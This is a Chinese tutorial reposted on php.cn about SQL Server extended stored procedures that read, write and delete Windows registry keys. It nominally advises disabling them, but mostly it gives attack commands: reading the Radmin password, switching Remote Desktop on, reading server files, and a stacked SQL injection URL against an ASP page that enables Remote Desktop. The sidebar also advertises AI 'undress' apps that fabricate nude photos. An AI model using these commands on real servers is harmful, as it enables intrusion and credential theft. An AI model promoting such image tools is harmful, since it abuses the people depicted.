几个扩展存储过程使用方法-tutorial mysql-php.cn

Rumah

pangkalan data

tutorial mysql

几个扩展存储过程使用方法

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 06:01 PM

prosedur tersimpan Kembangkan

sqlserver里面有一些危险的扩展存储过程，可以操作注册表，所以很多情况下，下面的存储过程为了服务器安全都会将这些存储过程删除。不过防御与安全同等重要。下面是具体的注册的操作方法。

SQL Server中包含了几个可以访问系统的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
xp_regenumvalues 以多个记录集方式返回所有键值
使用方法:
xp_regenumvalues 根键, 子键
比如说,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有键值:

use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'

xp_regread 返回制定键的值
使用方法:
xp_regread 根键,子键,键值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密码
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
远程桌面开启为0
xp_regwrite 写入
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必须清空后再写新数值
修改成功的前提是值为空
注意值类型有2种REG_SZ 表示字符型,相当于新建字符串值,REG_DWORD 表示整型,相当于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用远程桌面
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'

xp_regdeletekey 删除键,包括该键下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'

运行前提SA
可能用处不是很大，也没深入研究，因为觉得读asp用xp_makecab更方便点，仅供思维扩展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
开启远程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--

Kenyataan Laman Web ini

Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Alat AI Hot

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Penyingkiran pakaian AI

AI Hentai Generator

Menjana ai hentai secara percuma.

Tunjukkan Lagi

Artikel Panas

R.E.P.O. Kristal tenaga dijelaskan dan apa yang mereka lakukan (kristal kuning)

3 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Tetapan grafik terbaik

3 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Penyelesaian Riddle Seashell

2 minggu yang lalu By DDD

R.E.P.O. Cara Memperbaiki Audio Jika anda tidak dapat mendengar sesiapa

3 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌

WWE 2K25: Cara Membuka Segala -galanya Di Myrise

4 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌

Tunjukkan Lagi

Alat panas

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina

Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1

Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6

Alat pembangunan web visual

SublimeText3 versi Mac

Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Tunjukkan Lagi

Topik panas

Di manakah pintu masuk log masuk untuk e-mel gmail?

7478

Tutorial CakePHP

1377

Apakah format nama akaun stim

kunci pengaktifan win11 kekal

Sambungan NYT menunjukkan dan jawapan

Tunjukkan Lagi

Related knowledge

Dari awal hingga akhir: Cara menggunakan cURL sambungan php untuk membuat permintaan HTTP Jul 29, 2023 pm 05:07 PM

Dari awal hingga akhir: Cara menggunakan cURL sambungan php untuk permintaan HTTP Pengenalan: Dalam pembangunan web, selalunya perlu untuk berkomunikasi dengan API pihak ketiga atau pelayan jauh lain. Menggunakan cURL untuk membuat permintaan HTTP ialah cara yang biasa dan berkesan. Artikel ini akan memperkenalkan cara menggunakan PHP untuk melanjutkan cURL untuk melaksanakan permintaan HTTP dan menyediakan beberapa contoh kod praktikal. 1. Penyediaan Pertama, pastikan php telah memasang sambungan cURL. Anda boleh melaksanakan php-m|grepcurl pada baris arahan untuk menyemak

Sambungan dan modul pihak ketiga untuk fungsi PHP Apr 13, 2024 pm 02:12 PM

Untuk melanjutkan fungsi fungsi PHP, anda boleh menggunakan sambungan dan modul pihak ketiga. Sambungan menyediakan fungsi dan kelas tambahan yang boleh dipasang dan didayakan melalui pengurus pakej pecl. Modul pihak ketiga menyediakan fungsi khusus dan boleh dipasang melalui pengurus pakej Komposer. Contoh praktikal termasuk menggunakan sambungan untuk menghuraikan data JSON yang kompleks dan menggunakan modul untuk mengesahkan data.

Langkah dan langkah berjaga-jaga untuk melaksanakan kemas kini kelompok menggunakan prosedur tersimpan Oracle Mar 08, 2024 pm 04:12 PM

Tajuk: Langkah dan Langkah Berjaga-jaga untuk Melaksanakan Kemas Kini Berkelompok oleh Oracle Stored Procedures Dalam pangkalan data Oracle, prosedur tersimpan ialah satu set pernyataan SQL yang direka untuk meningkatkan prestasi pangkalan data, menggunakan semula kod dan meningkatkan keselamatan prosedur boleh digunakan untuk mengemas kini data dalam kelompok. Artikel ini akan memperkenalkan cara menggunakan prosedur tersimpan Oracle untuk melaksanakan kemas kini kelompok dan menyediakan contoh kod khusus. Langkah 1: Buat prosedur tersimpan Pertama, kita perlu mencipta prosedur tersimpan untuk melaksanakan operasi kemas kini kelompok. Berikut ialah cara membuat prosedur tersimpan

Bagaimana untuk memasang sambungan mbstring di bawah CENTOS7? Jan 06, 2024 pm 09:59 PM

1.UncaughtError:Calltoundefinedfunctionmb_strlen(); Apabila ralat di atas berlaku, ini bermakna kami belum memasang sambungan mbstring 2. Masukkan direktori pemasangan PHP cd/temp001/php-7.1.0/ext/mbstring 3. Mulakan phpize(; /usr/local/bin /phpize atau /usr/local/php7-abel001/bin/phpize) arahan untuk memasang sambungan php 4../configure--with-php-config=/usr/local/php7-abel

Bagaimana untuk memadam prosedur tersimpan dalam MySQL Sep 05, 2023 am 10:25 AM

Kaedah MySQL untuk memadamkan prosedur tersimpan termasuk menggunakan pernyataan DROP PROCEDURE, menggunakan MySQL Workbench dan menggunakan alat baris arahan. Pengenalan terperinci: 1. Gunakan pernyataan DROP PROCEDURE Langkah-langkahnya adalah untuk membuka klien MySQL terlebih dahulu atau menggunakan mana-mana alat yang menyokong MySQL, kemudian menyambung ke pangkalan data MySQL anda, dan akhirnya melaksanakan pernyataan SQL berikut untuk memadamkan prosedur yang disimpan. Gunakan MySQL Workbench untuk memadam prosedur yang disimpan dan sebagainya.

Prosedur tersimpan Oracle: Kaedah pelaksanaan untuk menentukan sama ada jadual wujud Mar 08, 2024 pm 09:18 PM

Prosedur tersimpan dalam pangkalan data Oracle ialah jenis prosedur tersimpan khusus yang digunakan untuk melaksanakan satu siri pernyataan SQL dan operasi data dalam pangkalan data. Dalam kerja pembangunan pangkalan data sebenar, kadangkala kita perlu menentukan sama ada jadual tertentu wujud dalam pangkalan data, supaya kita boleh melakukan beberapa pertimbangan dan pemprosesan logik dalam proses penyimpanan. Di bawah ini kami akan memperkenalkan cara melaksanakan kaedah menentukan sama ada jadual wujud dalam pangkalan data Oracle, dan menyediakan contoh kod khusus. Pertama, kita boleh menggunakan jadual sistem user_tables atau all_t

Prinsip pelaksanaan dan aplikasi prosedur tersimpan Golang Feb 22, 2024 pm 04:57 PM

Prinsip Pelaksanaan dan Aplikasi Prosedur Tersimpan Golang Prosedur tersimpan ialah atur cara yang telah disusun sebelumnya yang disimpan dalam pangkalan data hubungan dan boleh dipanggil oleh aplikasi Ia boleh mengurangkan kos penghantaran data rangkaian dan meningkatkan kecekapan pelaksanaan pangkalan data. Walaupun Golang tidak menyokong prosedur tersimpan secara langsung, anda boleh mensimulasikan fungsi prosedur tersimpan dengan menggunakan pernyataan SQL. Artikel ini akan memperkenalkan prinsip dan aplikasi melaksanakan prosedur tersimpan di Golang, dan menyediakan contoh kod khusus. 1. Prinsip pelaksanaan prosedur tersimpan Golang adalah dalam Gol

Bagaimana untuk menulis prosedur dan fungsi tersimpan tersuai dalam MySQL menggunakan C# Sep 22, 2023 am 09:42 AM

Cara menulis prosedur dan fungsi tersimpan tersuai dalam MySQL menggunakan C# Pengenalan: MySQL ialah sistem pengurusan pangkalan data sumber terbuka yang digunakan secara meluas, dan C# ialah bahasa pengaturcaraan berorientasikan objek yang biasa digunakan. Semasa proses pembangunan, kita selalunya perlu menggunakan prosedur dan fungsi yang disimpan pangkalan data untuk meningkatkan kebolehgunaan dan prestasi kod semula. Artikel ini akan memperkenalkan cara menggunakan C# untuk menulis prosedur dan fungsi tersimpan tersuai dalam pangkalan data MySQL, dan menyediakan contoh kod khusus. 1. Prosedur tersimpan Prosedur tersimpan ialah satu set pernyataan SQL yang melaksanakan tugas tertentu.

See all articles